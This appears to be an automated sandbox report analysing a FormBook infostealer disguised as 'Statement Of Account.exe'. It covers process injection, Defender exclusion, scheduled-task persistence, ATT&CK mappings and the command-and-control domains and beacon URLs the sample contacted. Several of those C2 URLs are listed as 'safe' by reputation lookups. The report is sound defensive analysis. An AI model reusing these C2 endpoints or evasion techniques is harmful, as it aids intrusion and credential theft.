          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeQueries volume information: C:\Users\user\AppData\Roaming\SdYCcXyq.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Scheduled Task/Job          		1
          Scheduled Task/Job          		812
          Process Injection          		1
          Rootkit          		1
          Credential API Hooking          		221
          Security Software Discovery          		Remote Services1
          Credential API Hooking          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Shared Modules          		1
          DLL Side-Loading          		1
          Scheduled Task/Job          		1
          Masquerading          		LSASS Memory2
          Process Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		4
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading          		11
          Disable or Modify Tools          		Security Account Manager41
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook41
          Virtualization/Sandbox Evasion          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture13
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script812
          Process Injection          		LSA Secrets1
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Deobfuscate/Decode Files or Information          		Cached Domain Credentials112
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
          Obfuscated Files or Information          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
          Software Packing          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          DLL Side-Loading          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430501 Sample: Statement Of Account.exe Startdate: 23/04/2024 Architecture: WINDOWS Score: 100 57 www.zdryueva.com 2->57 59 www.bodution.website 2->59 61 4 other IPs or domains 2->61 79 Snort IDS alert for network traffic 2->79 81 Found malware configuration 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 14 other signatures 2->85 11 Statement Of Account.exe 7 2->11         started        15 SdYCcXyq.exe 5 2->15         started        signatures3 process4 file5 53 C:\Users\user\AppData\Roaming\SdYCcXyq.exe, PE32 11->53 dropped 55 C:\Users\user\AppData\Local\...\tmp9A8F.tmp, XML 11->55 dropped 87 Writes to foreign memory regions 11->87 89 Allocates memory in foreign processes 11->89 91 Adds a directory exclusion to Windows Defender 11->91 17 RegSvcs.exe 11->17         started        20 powershell.exe 23 11->20         started        22 powershell.exe 23 11->22         started        24 schtasks.exe 1 11->24         started        93 Multi AV Scanner detection for dropped file 15->93 95 Machine Learning detection for dropped file 15->95 97 Injects a PE file into a foreign processes 15->97 26 RegSvcs.exe 15->26         started        28 schtasks.exe 15->28         started        signatures6 process7 signatures8 69 Modifies the context of a thread in another process (thread injection) 17->69 71 Maps a DLL or memory area into another process 17->71 73 Sample uses process hollowing technique 17->73 77 2 other signatures 17->77 30 explorer.exe 32 1 17->30 injected 75 Loading BitLocker PowerShell Module 20->75 34 WmiPrvSE.exe 20->34         started        36 conhost.exe 20->36         started        38 conhost.exe 22->38         started        40 conhost.exe 24->40         started        42 conhost.exe 28->42         started        process9 dnsIp10 63 www.airzf.com 154.12.38.29, 49748, 80 UNMETEREDCA United States 30->63 65 www.b-a-s-e.net 91.195.240.94, 49750, 80 SEDO-ASDE Germany 30->65 67 td-ccm-neg-87-45.wixdns.net 34.149.87.45, 49751, 80 ATGS-MMD-ASUS United States 30->67 105 System process connects to network (likely due to code injection or exploit) 30->105 44 cmstp.exe 30->44         started        47 colorcpl.exe 30->47         started        signatures11 process12 signatures13 99 Modifies the context of a thread in another process (thread injection) 44->99 101 Maps a DLL or memory area into another process 44->101 103 Tries to detect virtualization through RDTSC time measurements 44->103 49 cmd.exe 44->49         started        process14 process15 51 conhost.exe 49->51         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Statement Of Account.exe24%ReversingLabs
          Statement Of Account.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\SdYCcXyq.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\SdYCcXyq.exe24%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://schemas.micr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%URL Reputationsafe
          https://outlook.com_0%URL Reputationsafe
          http://schemas.mi0%URL Reputationsafe
          https://powerpoint.office.comcember0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.airzf.comReferer:0%Avira URL Cloudsafe
          http://www.novistashop.com/gs12/www.nexelab.com0%Avira URL Cloudsafe
          http://www.b-a-s-e.netReferer:0%Avira URL Cloudsafe
          http://www.hjgd.xyz0%Avira URL Cloudsafe
          http://www.juniavilela.com/gs12/www.lolabeautystudios.com0%Avira URL Cloudsafe
          http://www.hjgd.xyz/gs12/www.bodution.website0%Avira URL Cloudsafe
          http://www.zdryueva.comReferer:0%Avira URL Cloudsafe
          http://www.b-a-s-e.net/gs12/0%Avira URL Cloudsafe
          http://www.demandstudiosnews.com/gs12/www.heavydutywearpart.com0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
          http://www.baansbliss.comReferer:0%Avira URL Cloudsafe
          http://www.lolabeautystudios.com0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
          http://www.juniavilela.com/gs12/0%Avira URL Cloudsafe
          http://www.b-a-s-e.net0%Avira URL Cloudsafe
          http://www.baansbliss.com0%Avira URL Cloudsafe
          http://www.juniavilela.com0%Avira URL Cloudsafe
          http://www.airzf.com0%Avira URL Cloudsafe
          http://www.kustomequipment.com/gs12/0%Avira URL Cloudsafe
          http://www.zdryueva.com0%Avira URL Cloudsafe
          http://www.airzf.com/gs12/?r6-=DR9+51rACou4eQBXOdoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpwURv63eY6pg&YN=9rKtZn50%Avira URL Cloudsafe
          http://www.udin88b.usReferer:0%Avira URL Cloudsafe
          http://www.lolabeautystudios.comReferer:0%Avira URL Cloudsafe
          http://www.lolabeautystudios.com/gs12/0%Avira URL Cloudsafe
          http://www.udin88b.us/gs12/0%Avira URL Cloudsafe
          http://www.kustomequipment.com/gs12/www.novistashop.com0%Avira URL Cloudsafe
          http://www.baansbliss.com/gs12/www.otirugkyt.com0%Avira URL Cloudsafe
          http://www.demandstudiosnews.com0%Avira URL Cloudsafe
          http://www.otirugkyt.com0%Avira URL Cloudsafe
          http://www.hjgd.xyz/gs12/0%Avira URL Cloudsafe
          http://www.airzf.com/gs12/0%Avira URL Cloudsafe
          http://www.bodution.website/gs12/www.juniavilela.com0%Avira URL Cloudsafe
          http://www.demandstudiosnews.comReferer:0%Avira URL Cloudsafe
          http://www.heavydutywearpart.com0%Avira URL Cloudsafe
          http://www.novistashop.comReferer:0%Avira URL Cloudsafe
          http://www.nexelab.com/gs12/www.udin88b.us0%Avira URL Cloudsafe
          http://www.bodution.websiteReferer:0%Avira URL Cloudsafe
          http://www.demandstudiosnews.com/gs12/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
          http://www.lolabeautystudios.com/gs12/www.kustomequipment.com0%Avira URL Cloudsafe
          http://www.heavydutywearpart.com/gs12/www.goldenvistaservices.com0%Avira URL Cloudsafe
          http://www.bodution.website/gs12/0%Avira URL Cloudsafe
          http://www.novistashop.com0%Avira URL Cloudsafe
          http://www.juniavilela.comReferer:0%Avira URL Cloudsafe
          http://www.zdryueva.com/gs12/www.hjgd.xyz0%Avira URL Cloudsafe
          http://www.udin88b.us/gs12/www.baansbliss.com0%Avira URL Cloudsafe
          http://www.goldenvistaservices.com/gs12/0%Avira URL Cloudsafe
          http://www.goldenvistaservices.comReferer:0%Avira URL Cloudsafe
          http://www.b-a-s-e.net/gs12/?r6-=QIIWKxrtyX7LT6NTTkxUIHQxUymhf5FB+GXjykqQ4dPV8mdQoaOANT6/8pJ3wvHey5SR&YN=9rKtZn50%Avira URL Cloudsafe
          http://www.nexelab.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.airzf.com
          		154.12.38.29
          		truetrue
            		unknown
            www.b-a-s-e.net
            		91.195.240.94
            		truetrue
              		unknown
              www.bodution.website
              		160.124.174.163
              		truetrue
                		unknown
                td-ccm-neg-87-45.wixdns.net
                		34.149.87.45
                		truetrue
                  		unknown
                  www.zdryueva.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.airzf.com/gs12/?r6-=DR9+51rACou4eQBXOdoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpwURv63eY6pg&YN=9rKtZn5true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.b-a-s-e.net/gs12/?r6-=QIIWKxrtyX7LT6NTTkxUIHQxUymhf5FB+GXjykqQ4dPV8mdQoaOANT6/8pJ3wvHey5SR&YN=9rKtZn5true
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://aka.ms/odirmrexplorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      http://www.demandstudiosnews.com/gs12/www.heavydutywearpart.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.novistashop.com/gs12/www.nexelab.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.hjgd.xyzexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        http://www.juniavilela.com/gs12/www.lolabeautystudios.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://excel.office.comexplorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                http://www.b-a-s-e.net/gs12/explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.hjgd.xyz/gs12/www.bodution.websiteexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.airzf.comReferer:explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sajatypeworks.comStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cn/cTheStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.b-a-s-e.netReferer:explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.zdryueva.comReferer:explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.baansbliss.comReferer:explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.lolabeautystudios.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.baansbliss.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.galapagosdesign.com/DPleaseStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000009.00000002.2951588982.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.urwpp.deDPleaseStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.zhongyicts.com.cnStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.juniavilela.com/gs12/explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameStatement Of Account.exe, 00000000.00000002.1703144585.0000000003150000.00000004.00000800.00020000.00000000.sdmp, SdYCcXyq.exe, 0000000B.00000002.1741610690.0000000002CBA000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.juniavilela.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.zdryueva.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.airzf.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.b-a-s-e.netexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
